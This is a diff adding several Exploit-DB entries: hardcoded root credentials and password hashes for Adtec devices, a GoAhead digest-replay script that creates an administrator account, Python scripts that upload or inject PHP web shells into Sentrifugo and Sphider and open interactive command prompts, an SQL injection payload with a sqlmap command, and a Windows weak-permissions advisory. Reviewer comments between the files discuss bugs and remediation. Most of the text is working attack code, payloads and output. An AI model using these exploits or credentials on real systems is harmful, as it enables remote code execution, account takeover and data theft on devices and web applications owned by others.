diff --git a/exploits/hardware/remote/48954.txt b/exploits/hardware/remote/48954.txt
new file mode 100644
index 000000000..b03ace479
--- /dev/null
+++ b/exploits/hardware/remote/48954.txt
@@ -0,0 +1,108 @@
+# Exploit Title: Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
+# Date: 2020-07-24
+# Exploit Author: LiquidWorm
+# Software Link: https://www.adtecdigital.com / https://www.adtecdigital.com/support/documents-downloads
+# Version: Multiple
+
+Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root
+
+
+Vendor: Adtec Digital, Inc.
+Product web page: https://www.adtecdigital.com
+ https://www.adtecdigital.com/support/documents-downloads
+Affected version: SignEdje Digital Signage Player v2.08.28
+ mediaHUB HD-Pro High & Standard Definition MPEG2 Encoder v3.07.19
+ afiniti Multi-Carrier Platform v1905_11
+ EN-31 Dual Channel DSNG Encoder / Modulator v2.01.15
+ EN-210 Multi-CODEC 10-bit Encoder / Modulator v3.00.29
+ EN-200 1080p AVC Low Latency Encoder / Modulator v3.00.29
+ ED-71 10-bit / 1080p Integrated Receiver Decoder v2.02.24
+ edje-5110 Standard Definition MPEG2 Encoder v1.02.05
+ edje-4111 HD Digital Media Player v2.07.09
+ Soloist HD-Pro Broadcast Decoder v2.07.09
+ adManage Traffic & Media Management Application v2.5.4
+
+Summary: Adtec Digital is a leading manufacturer of Broadcast, Cable and IPTV products and
+solutions.
+
+Desc: The devices utilizes hard-coded and default credentials within its Linux distribution
+image for Web/Telnet/SSH access. A remote attacker could exploit this vulnerability by logging
+in using the default credentials for accessing the web interface or gain shell access as root.
+
+Tested on: GNU/Linux 4.1.8 (armv7l)
+ GNU/Linux 3.12.38 (PowerPC)
+ GNU/Linux 2.6.14 (PowerPC)
+ Adtec Embedded Linux 0.9 (fido)
+ Apache
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5603
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php
+
+
+24.07.2020
+
+--
+
+
+Creds:
+------
+
+adtec:none:500:1000:adtec:/media:/bin/sh
+admin:1admin!:502:502:admin:/home/admin:/bin/sh
+root1:1root!:0:0:root:/root:/bin/sh
+adtecftp:adtecftp2231
+
+
+SSH:
+----
+
+login as: root
+root@192.168.3.12's password:
+
+Successfully logged in.
+Thank you for choosing Adtec Digital products-
+we know you had a choice and we appreciate your decision!
+
+root@targethostname:~# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+--
+admin@targethostname:/$ id
+uid=502(admin) gid=502(admin) groups=0(root),502(admin)
+admin@targethostname:~$ id adtec
+uid=500(adtec) gid=1000(users) groups=1000(users),72(apache)
+admin@targethostname:~$ cat /etc/sudoers |grep -v "#"
+root ALL=(ALL) ALL
+apache ALL=(ALL) NOPASSWD: ALL
+
+
+Telnet (API):
+-------------
+
+Adtec Resident Telnet Server...
+UserName:
+adtec
+adtec
+PassWord:
+none
+User adtec connected
+*.SYSD SHELLCMD cat /etc/passwd
+*.SYSD CMD cat /etc/passwd
+OK
+root:he7TRuXjJjxfc:0:0:root:/root:/bin/sh
+adtec:GC1BpYa80PaoY:500:1000:adtec:/media:/bin/sh
+apache:!!:72:72:Apache Server:/dev/null:/sbin/nologin
+fregd:!!:73:73:Freg Daemon:/dev/null:/sbin/nologin
+ntp:!!:38:38:NTP Server:/dev/null:/sbin/nologin
+syslogd:!!:74:74:Syslog Daemon:/dev/null:/sbin/nologin
+admin:rDglOB38TVYRg:502:502:admin:/home/admin:/bin/sh
+sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
+avahi:x:82:82:Avahi Daemon:/dev/null/:/sbin/nologin
+avahi-autoipd:x:83:83:Avahi Autoipd:/dev/null/:/sbin/nologin
+messagebus:x:81:81:Message Bus Daemon:/dev/null:/sbin/nologin
+...
+...
\ No newline at end of file
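Review bot: The advisory text in 48954.txt gives no remediation or fix status, so an operator reading it learns which accounts exist but not what to do about them. A closing section should state whether the vendor has released firmware that removes or randomises these accounts and, until then, recommend changing the listed passwords where the device allows it and limiting Web, Telnet and SSH access to a management network. The transcript also shows `apache ALL=(ALL) NOPASSWD: ALL` in `/etc/sudoers` and password hashes stored in `/etc/passwd`, neither of which the Desc paragraph mentions; both are separate hardening findings that deserve a sentence each.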
diff --git a/exploits/hardware/remote/48958.py b/exploits/hardware/remote/48958.py
new file mode 100755
index 000000000..4b873452c
--- /dev/null
+++ b/exploits/hardware/remote/48958.py
@@ -0,0 +1,108 @@
+# Exploit Title: GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse
+# Date: 2019-08-29
+# Exploit Author: LiquidWorm
+# Software Link: https://www.embedthis.com
+# Version: 5.1.1
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+# EmbedThis GoAhead Web Server 5.1.1 Digest Authentication Capture Replay Nonce Reuse
+#
+#
+# Vendor: Embedthis Software LLC
+# Product web page: https://www.embedthis.com
+# Affected version: <=5.1.1 and <=4.1.2
+# Fixed version: >=5.1.2 and >=4.1.3
+#
+# Summary: GoAhead is the world's most popular, tiny embedded web server. It is compact,
+# secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is
+# ideal for the smallest of embedded devices.
+#
+# Desc: A security vulnerability affecting GoAhead versions 2 to 5 has been identified when
+# using Digest authentication over HTTP. The HTTP Digest Authentication in the GoAhead web
+# server does not completely protect against replay attacks. This allows an unauthenticated
+# remote attacker to bypass authentication via capture-replay if TLS is not used to protect
+# the underlying communication channel. Digest authentication uses a "nonce" value to mitigate
+# replay attacks. GoAhead versions 3 to 5 validated the nonce with a fixed duration of 5 minutes
+# which permitted short-period replays. This duration is too long for most implementations.
+#
+# Tested on: GoAhead-http
+# GoAhead-Webs
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5598
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5598.php
+#
+# CVE ID: CVE-2020-15688
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15688
+# https://nvd.nist.gov/vuln/detail/CVE-2020-15688
+#
+# CWE ID: CWE-294 Authentication Bypass by Capture-replay
+# CWE URL: https://cwe.mitre.org/data/definitions/294.html
+#
+# CWE ID: CWE-323: Reusing a Nonce, Key Pair in Encryption
+# CWE URL: https://cwe.mitre.org/data/definitions/323.html
+#
+# GoAhead Security Alerts / Fix:
+# https://github.com/embedthis/goahead-gpl/issues/3
+# https://github.com/embedthis/goahead-gpl/issues/2
+# https://github.com/embedthis/goahead-gpl/commit/fe0662f945bd7e24b8d621929e1b93d8a7f3f08f#diff-0988df549d878c849d7f2c073319bcb2
+#
+#
+# 29.08.2019
+#
+
+
+#
+# PoC for a network controller running GoAhead web server.
+# Replay Authentication Bypass / Create Admin User
+#
+
+import requests
+import sys#####
+
+if (len(sys.argv) <= 1):
+ print("Usage: ./nen.py ")
+ exit(0)
+
+ip = sys.argv[1]
+
+url = "http://"+ip+"/goform/formUserManagementAdd?lang=en"
+kolache = {"lang":"en"}
+
+replay = "Digest username=\"admin\", "
+replay += "realm=\"GoAhead\", "
+replay += "nonce=\"5fb3ce6dec423bf8b8f0dfc8cf65244d\", "
+replay += "uri=\"/goform/formUserManagementAdd?lang=en\", "
+replay += "algorithm=MD5, "
+replay += "response=\"1c05f4d08aa0cfcc5318882e0fb4e9af\", "
+replay += "opaque=\"5ccc069c403ebaf9f0171e9517f40e41\", "
+replay += "qop=auth, "
+replay += "nc=0000000a, "
+replay += "cnonce=\"0649f631320f23bb\""
+
+headers = {"Cache-Control": "max-age=0",
+ "Authorization": replay,
+ "Content-Type": "application/x-www-form-urlencoded",
+ "User-Agent": "NoProxy/NoProblem.251",
+ "Accept-Encoding": "gzip, deflate",
+ "Accept-Language": "mk-MK;q=0.9,mk;q=0.8",
+ "Connection": "close"}
+
+data = {"FormSubmitCause": "button",
+ "DefinitionAction": "add",
+ "Define_admin_ID": "admin",
+ "Define_admin_Name": "admin",
+ "Define________Action________ID": '',
+ "Define________Action________Name": "testingus",
+ "Define________Action________Password": "testingus",
+ "Define________Action________Group": "Administrators"}
+
+requests.post(url, headers=headers, cookies=kolache, data=data)
+
+print("Finito")
\ No newline at end of file
diff --git a/exploits/php/webapps/48955.py b/exploits/php/webapps/48955.py
new file mode 100755
index 000000000..03aded8a8
--- /dev/null
+++ b/exploits/php/webapps/48955.py
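Review bot: The result of `requests.post(...)` at the end of 48958.py is discarded and `print("Finito")` runs whatever the server answered, so the output cannot serve as evidence that a device is vulnerable or that the fixed releases named in the header (>=5.1.2, >=4.1.3) reject the replayed header. Keeping the response and reporting its status, `r = requests.post(url, headers=headers, cookies=kolache, data=data, timeout=10)` followed by `print(r.status_code)`, would make a patch-verification run meaningful and stop the script from hanging on an unreachable host. The form data also adds an account in the `Administrators` group whose name and password are both the published string `testingus`, and nothing removes it; a comment such as `# leaves a persistent admin account with a published password - delete it after the test` belongs above `data`. The shebang and coding lines sit below the Exploit-DB header block, so they have no effect although the file is added with mode 100755.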
@@ -0,0 +1,96 @@
+# Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)
+# Date: 26/10/2020
+# Exploit Author: Gurkirat Singh
+# Vendor Homepage: http://www.sentrifugo.com/
+# POC Link: https://www.exploit-db.com/exploits/47323
+# Version: 3.2
+# Tested on: Linux and Windows
+# CVE : CVE-2019-15813
+# Contact Details: https://google.com/search?q=tbhaxor
+
+from argparse import ArgumentParser, RawTextHelpFormatter
+from bs4 import BeautifulSoup, Tag
+from requests.sessions import Session
+import tempfile as tmp
+import os.path as path
+import random
+import string
+from huepy import *
+
+parser = ArgumentParser(description="Exploit for CVE-2019-15813",
+ formatter_class=RawTextHelpFormatter)
+parser.add_argument("--target",
+ "-t",
+ help="target uri where application is installed",
+ required=True,
+ metavar="",
+ dest="t")
+parser.add_argument("--user",
+ "-u",
+ help="username to authenticate",
+ required=True,
+ metavar="",
+ dest="u")
+parser.add_argument("--password",
+ "-p",
+ help="password to authenticate",
+ required=True,
+ metavar="",
+ dest="p")
+args = parser.parse_args()
+
+if args.t.endswith("/"):
+ args.t = args.t[:-1]
+
+F = "".join(random.choices(string.ascii_letters, k=13)) + ".php"
+
+with Session() as http:
+ print(run("Logging in"))
+ data = {"username": args.u, "password": args.p}
+
+ r = http.post(args.t + "/index.php/index/loginpopupsave",
+ data=data,
+ allow_redirects=False)
+
+ if not (r.headers.get("Location", "").endswith("welcome")
+ or r.headers.get("Location", "").endswith("welcome/")):
+ print(bad("Unable to login. Check username / password"))
+ exit(1)
+ print(good("Logged in"))
+
+ print(run("Exploiting"))
+ files = {"myfile": ("shell.php", "")}
+
+ r = http.post(args.t + "/index.php/policydocuments/uploaddoc", files=files)
+ if r.status_code != 200:
+ print(bad("Unable to upload file"))
+ exit(1)
+ file_name = r.json()["filedata"]["new_name"]
+ print(info("Spawning shell"))
+
+ user = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+ data={"cmd": "whoami"})
+ host = http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+ data={"cmd": "cat /etc/hostname"})
+ shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
+
+ while True:
+ try:
+ cmd = input(shell)
+ if cmd == "exit": break
+ r = http.post(args.t + "/public/uploads/policy_doc_temp/" +
+ file_name,
+ data={"cmd": cmd})
+ print(r.content.decode().strip())
+ except Exception as e:
+ print()
+ break
+
+ print(run("Cleaning"))
+ http.post(args.t + "/public/uploads/policy_doc_temp/" + file_name,
+ data={"cmd": "rm %s" % file_name})
+ r = http.get(args.t + "/public/uploads/policy_doc_temp/" + file_name)
+ if r.status_code == 404:
+ print(good("Cleaned"))
+ else:
+ print(bad("Unable to clean the file"))
\ No newline at end of file
diff --git a/exploits/php/webapps/48956.txt b/exploits/php/webapps/48956.txt
new file mode 100644
index 000000000..90b067768
--- /dev/null
+++ b/exploits/php/webapps/48956.txt
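Review bot: The "Cleaning" step in 48955.py is only reached when the input loop ends normally; `except Exception` does not catch `KeyboardInterrupt`, so leaving the prompt with Ctrl-C skips the removal and the uploaded file stays reachable under `/public/uploads/policy_doc_temp/` for anyone who requests it. Putting the loop in `try:` and the cleanup requests in a `finally:` block would close that gap, and the `rm %s` command should be documented as Linux-only since the header says the script was tested on Windows as well. `tempfile`, `os.path`, `BeautifulSoup`, `Tag` and the generated name `F` are never used and can be dropped. For administrators checking an installation, unexpected `.php` files in that upload directory are the artefact this script leaves behind.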
@@ -0,0 +1,37 @@
+# Exploit Title: Client Management System 1.0 - 'searchdata' SQL injection
+# Date: 26/10/2020
+# Exploit Author: Serkan Sancar
+# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
+# Version: 1.0
+# Tested On: Windows 7 Enterprise SP1 + XAMPP V3.2.3
+
+Step 1: Open the URL http://localhost/clientms/client/index.php
+
+Step 2: Login to client user on panel
+
+Step 3: use check sql injection payload 1' or 1=1# in searchbox field
+
+Malicious Request on burp suite
+
+POST /clientms/client/search-invoices.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/clientms/client/search-invoices.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 210
+Origin: http://localhost
+Connection: close
+Cookie: PHPSESSID=q38d8f3sveqjciu02csdfem453
+Upgrade-Insecure-Requests: 1
+
+searchdata=1%27+or+1%3D1%23&search=
+
+Step 4: You will list all invoices and you will had checked sql injection on The Panel.
+
+Example other method:
+you saved to inspected package on burp suite. you can exploitation more easily with use sqlmap -r parameter.
+sqlmap -r cms.txt --risk=1 --level=1 --dbms=mysql --dbs
\ No newline at end of file
diff --git a/exploits/php/webapps/48957.py b/exploits/php/webapps/48957.py
new file mode 100755
index 000000000..f59b996e5
--- /dev/null
+++ b/exploits/php/webapps/48957.py
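Review bot: The write-up in 48956.txt stops at demonstrating the injection and names neither the cause nor a fix. A short remediation paragraph should say that `searchdata` in `search-invoices.php` has to reach the query as a bound parameter of a prepared statement instead of being concatenated into the SQL string; the source of that page is not shown here, so the exact statement needs to be confirmed against the application. The `Content-Length: 210` header in the captured request also does not match the 35-byte body printed below it, which suggests the request was edited after capture.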
@@ -0,0 +1,141 @@
+# Exploit Title: Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)
+# Google Dork: intitle:"Sphider Admin Login"
+# Date: 2014-07-28
+# Exploit Author: Gurkirat Singh
+# Vendor Homepage: http://www.sphider.eu/
+# Software Link: http://www.sphider.eu/sphider-1.3.6.zip
+# Version: v1.3.6
+# Tested on: Windows and Linux
+# CVE : CVE-2014-5194
+# Proof of Concept: https://www.exploit-db.com/exploits/34189
+
+from argparse import ArgumentParser, RawTextHelpFormatter
+from huepy import *
+import string
+import random
+from bs4 import BeautifulSoup, Tag
+from requests import Session
+from randua import generate as randua
+
+_F = "".join(random.choices(string.ascii_letters, k=13))
+
+parser = ArgumentParser(description="Exploit for CVE-2014-5194",
+ formatter_class=RawTextHelpFormatter)
+parser.add_argument("--target",
+ "-t",
+ help="target uri where application is installed",
+ required=True,
+ metavar="",
+ dest="t")
+parser.add_argument("--user",
+ "-u",
+ help="username to authenticate",
+ required=True,
+ metavar="",
+ dest="u")
+parser.add_argument("--password",
+ "-p",
+ help="password to authenticate",
+ required=True,
+ metavar="",
+ dest="p")
+parser.add_argument("--debug",
+ help="if passed, spawn the firefox window",
+ default=True,
+ action="store_false")
+parser.add_argument("--timeout",
+ help="timeout in seconds (default: 1)",
+ dest="T",
+ metavar="",
+ default=1)
+args = parser.parse_args()
+
+if args.t.endswith("/"):
+ args.t = args.t[:-1]
+
+print(run("Logging in"))
+
+with Session() as http:
+ data = {"user": args.u, "pass": args.p}
+
+ headers = {"User-Agent": randua()}
+ http.post(args.t + '/admin/auth.php',
+ data=data,
+ headers=headers,
+ allow_redirects=False)
+ r = http.get(args.t + '/admin/admin.php',
+ headers=headers,
+ allow_redirects=False)
+ html = BeautifulSoup(r.content.decode(), "lxml")
+ title: Tag = html.find("title")
+
+ if title.text == "Sphider Admin Login":
+ print(bad("Failed to login"))
+ exit(1)
+ else:
+ print(good("Logged in"))
+
+ payload = {
+ 'f': 'settings',
+ 'Submit': '1',
+ '_version_nr': '1.3.5',
+ '_language': 'en',
+ '_template': 'standard',
+ '_admin_email': 'admin@localhost',
+ '_print_results': '1',
+ '_tmp_dir': 'tmp',
+ '_log_dir': 'log',
+ '_log_format': 'html',
+ '_min_words_per_page': '10',
+ '_min_word_length': '3',
+ '_word_upper_bound': '100;system($_POST[cmd])',
+ '_index_numbers': '1',
+ '_index_meta_keywords': '1',
+ '_pdftotext_path': 'c:\\temp\\pdftotext.exe',
+ '_catdoc_path': 'c:\\temp\\catdoc.exe',
+ '_xls2csv_path': 'c:\\temp\\xls2csv',
+ '_catppt_path': 'c:\\temp\\catppt',
+ '_user_agent': 'Sphider',
+ '_min_delay': '0',
+ '_strip_sessids': '1',
+ '_results_per_page': '10',
+ '_cat_columns': '2',
+ '_bound_search_result': '0',
+ '_length_of_link_desc': '0',
+ '_links_to_next': '9',
+ '_show_meta_description': '1',
+ '_show_query_scores': '1',
+ '_show_categories': '1',
+ '_desc_length': '250',
+ '_did_you_mean_enabled': '1',
+ '_suggest_enabled': '1',
+ '_suggest_history': '1',
+ '_suggest_rows': '10',
+ '_title_weight': '20',
+ '_domain_weight': '60',
+ '_path_weight': '10',
+ '_meta_weight': '5'
+ }
+
+ print(run("Exploiting"))
+ http.post(args.t + "/admin/admin.php", data=payload)
+ r = http.post(args.t + "/settings/conf.php", data={"cmd": "echo %s" % _F})
+ if r.content.decode().strip() != _F:
+ print(bad("Failed"))
+ exit(1)
+ print(good("Exploited"))
+ print(info("Spawning Shell"))
+ user = http.post(args.t + "/settings/conf.php", data={"cmd": "whoami"})
+ host = http.post(args.t + "/settings/conf.php",
+ data={"cmd": "cat /etc/hostname"})
+ shell = f"{lightgreen('%s@%s'%(user.content.decode().strip(), host.content.decode().strip()))}{blue('$ ')}"
+
+ while True:
+ try:
+ cmd = input(shell)
+ if cmd == "exit": break
+ r = http.post(args.t + "/settings/conf.php", data={"cmd": cmd})
+ print(r.content.decode().strip())
+ except:
+ break
+ print()
\ No newline at end of file
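Review bot: Nothing in 48957.py restores the settings it overwrites: the POST to `/admin/admin.php` replaces the whole configuration with the hard-coded values in `payload` (Windows tool paths, `admin@localhost`, `_version_nr` 1.3.5 although the entry is for 1.3.6) and leaves `system($_POST[cmd])` in `settings/conf.php` after the session ends. A header comment should say that the original `conf.php` must be backed up and restored after a test, because until then the file presumably executes commands for any client that can reach it. The `--debug` and `--timeout` options are parsed but never read, and their help text (a Firefox window) matches nothing the script does; remove them or pass `timeout=` to the requests. `title` can be `None` when the response has no title element, and the bare `except:` also swallows `KeyboardInterrupt`; `except (EOFError, KeyboardInterrupt):` states the intent.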
diff --git a/exploits/windows/local/48953.txt b/exploits/windows/local/48953.txt
new file mode 100644
index 000000000..305b4bbcd
--- /dev/null
+++ b/exploits/windows/local/48953.txt
@@ -0,0 +1,62 @@
+# Exploit Title: TDM Digital Signage PC Player 4.1 - Insecure File Permissions
+# Date: 2020-09-23
+# Exploit Author: LiquidWorm
+# Software Link: https://www.tdmsignage.com / https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
+# Version: 4.1.0.4
+
+Vendor: TDM [Trending Digital Marketing]
+Product web page: https://www.tdmsignage.com
+ https://pro.sony/en_NL/products/display-software/tdm-ds1y-tdm-ds3y
+Affected version: 4.1.0.4
+
+Summary: With TDM you can do a lot more than just show Digital Signage.
+With our Enterprise-Grade software you open the door to Interactive Signage,
+Analytics, Proof of Play and a lot more.
+
+Desc: TDM Digital Signage Windows Player suffers from an elevation of
+privileges vulnerability which can be used by a simple authenticated
+user that can change the executable file with a binary of choice. The
+vulnerability exist due to the improper permissions, with the 'M' flag
+(Modify) or 'C' flag (Change) for 'Authenticated Users' group.
+
+Tested on: Microsoft Windows 10 Home
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2020-5604
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5604.php
+
+23.09.2020
+
+--
+
+
+C:\>icacls TDMSignage
+TDMSignage BUILTIN\Administrators:(I)(OI)(CI)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
+ BUILTIN\Users:(I)(OI)(CI)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<
+ NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files
+
+C:\TDMSignage>dir /b *.exe
+Player.exe
+unins000.exe
+
+C:\TDMSignage>icacls Player.exe && icacls unins000.exe
+Player.exe BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files
+unins000.exe BUILTIN\Administrators:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ NT AUTHORITY\Authenticated Users:(I)(M) <---------<<<
+
+Successfully processed 1 files; Failed processing 0 files
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a52917905..3732c47c7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
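Review bot: The advisory in 48953.txt shows the weak ACL but does not say how to correct it. Every `Authenticated Users` entry in the icacls output carries the `(I)` flag, meaning the Modify right is inherited from the parent of `C:\TDMSignage` rather than set explicitly by the installer, so the guidance for administrators should be to disable inheritance on the folder (`icacls C:\TDMSignage /inheritance:d`) and then remove the `Authenticated Users` grant, or to install under a directory that ordinary users cannot write to. The Desc paragraph also mentions a 'C' (Change) flag that appears nowhere in the output; only `(M)` is shown.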
@@ -10389,6 +10389,7 @@ id,file,description,date,author,type,platform,port
 48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 48873,exploits/windows/local/48873.txt,"Battle.Net 1.27.1.12428 - Insecure File Permissions",2020-10-13,"George Tsimpidas",local,windows,
 48876,exploits/windows/local/48876.txt,"Guild Wars 2 - Insecure Folder Permissions",2020-10-14,"George Tsimpidas",local,windows,
+48953,exploits/windows/local/48953.txt,"TDM Digital Signage PC Player 4.1 - Insecure File Permissions",2020-10-27,LiquidWorm,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -17825,6 +17826,8 @@ id,file,description,date,author,type,platform,port
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
 48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
+48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware,
+48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -40764,13 +40767,16 @@ id,file,description,date,author,type,platform,port
 48943,exploits/php/webapps/48943.py,"TextPattern CMS 4.8.3 - Remote Code Execution (Authenticated)",2020-10-23,0blio_,webapps,php,
 48944,exploits/php/webapps/48944.py,"CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection",2020-10-26,"Gurkirat Singh",webapps,php,
 48945,exploits/php/webapps/48945.txt,"Online Health Care System 1.0 - Multiple Cross Site Scripting (Stored)",2020-10-26,"Akıner Kısa",webapps,php,
-48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Simon Lyhin",webapps,php,
+48946,exploits/php/webapps/48946.py,"InoERP 0.7.2 - Remote Code Execution (Unauthenticated)",2020-10-26,"Lyhin\'s Lab",webapps,php,
 48947,exploits/php/webapps/48947.txt,"PDW File Browser 1.3 - 'new_filename' Cross-Site Scripting (XSS)",2020-10-26,"David Bimmel",webapps,php,
 48948,exploits/hardware/webapps/48948.txt,"Genexis Platinum-4410 - 'SSID' Persistent XSS",2020-10-26,"Amal Mohandas",webapps,hardware,
 48949,exploits/hardware/webapps/48949.txt,"ReQuest Serious Play Media Player 3.0 - Directory Traversal File Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
 48950,exploits/hardware/webapps/48950.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Debug Log Disclosure",2020-10-26,LiquidWorm,webapps,hardware,
 48951,exploits/hardware/webapps/48951.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Denial of Service",2020-10-26,LiquidWorm,webapps,hardware,
 48952,exploits/hardware/webapps/48952.txt,"ReQuest Serious Play F3 Media Server 7.0.3 - Remote Code Execution (Unauthenticated)",2020-10-26,LiquidWorm,webapps,hardware,
+48955,exploits/php/webapps/48955.py,"Sentrifugo 3.2 - File Upload Restriction Bypass (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php,
+48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,
+48957,exploits/php/webapps/48957.py,"Sphider Search Engine 1.3.6 - 'word_upper_bound' RCE (Authenticated)",2020-10-27,"Gurkirat Singh",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
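Review bot: The replaced row for 48946 stores the author as `"Lyhin\'s Lab"`, and in CSV an apostrophe inside a double-quoted field needs no escaping, so the backslash becomes part of the name for every consumer of files_exploits.csv. The field should read `"Lyhin's Lab"`. Only a doubled double quote (`""`) acts as an escape inside a quoted CSV field.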